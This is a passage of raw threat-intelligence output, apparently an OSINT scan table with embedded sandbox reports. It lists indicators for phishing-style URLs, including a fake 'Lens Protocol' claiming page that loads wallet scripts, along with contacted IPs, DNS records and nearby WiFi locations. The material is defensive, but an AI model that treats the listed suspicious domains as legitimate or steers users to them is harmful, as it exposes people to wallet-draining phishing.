"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n 
"172.64.132.15:443"\n "172.96.160.222:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "kill3r14.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "urlref_httpskill3r14.github.ionetflixClone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3C94.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3B75.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3BD5.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3CE3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3CF4.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3C16.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3C16.tmp]- [targetUID: 00000000-00001572]\n "Cab3BB5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3BB5.tmp]- [targetUID: 00000000-00001572]\n "Cab3B74.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3B74.tmp]- [targetUID: 00000000-00001572]\n "Cab3CE4.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 
datablocks 0x1 compression"- Location: [%TEMP%\\Cab3CE4.tmp]- [targetUID: 00000000-00001572]\n "Cab3C05.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3C05.tmp]- [targetUID: 00000000-00001572]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001572]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df540573ec48d9f88e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{2d5aca35-ebdf-11ed-accb-080027f0ed28}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df04e7119e6d22551d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{2d5aca37-ebdf-11ed-accb-080027f0ed28}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{2d5aca35-ebdf-11ed-accb-080027f0ed28}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df540573ec48d9f88e.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar3C94.tmp" has type "data"- Location: [%TEMP%\\Tar3C94.tmp]- [targetUID: 00000000-00001572]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab3C16.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3C16.tmp]- [targetUID: 00000000-00001572]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet 
Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003884]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF540573EC48D9F88E.TMP" has type "data"- Location: [%TEMP%\\~DF540573EC48D9F88E.TMP]- [targetUID: 00000000-00003884]\n "~DFBBE88F7BDB090BEA.TMP" has type "data"- Location: [%TEMP%\\~DFBBE88F7BDB090BEA.TMP]- | 185.199.108.153 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ply.gg | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 101 (Net ID: 00:01:03:7B:E0:44) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.248): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:04 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8000::153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:53:10:73) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | git@github.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n 
"imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has 
type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 |
| 2023-05-12 02:56:53 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vscode.battleb0t.xyz | [{"url": "https://vscode.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://vscode.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.47): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5c5df87c1e1957-FRA
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": 
"2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", 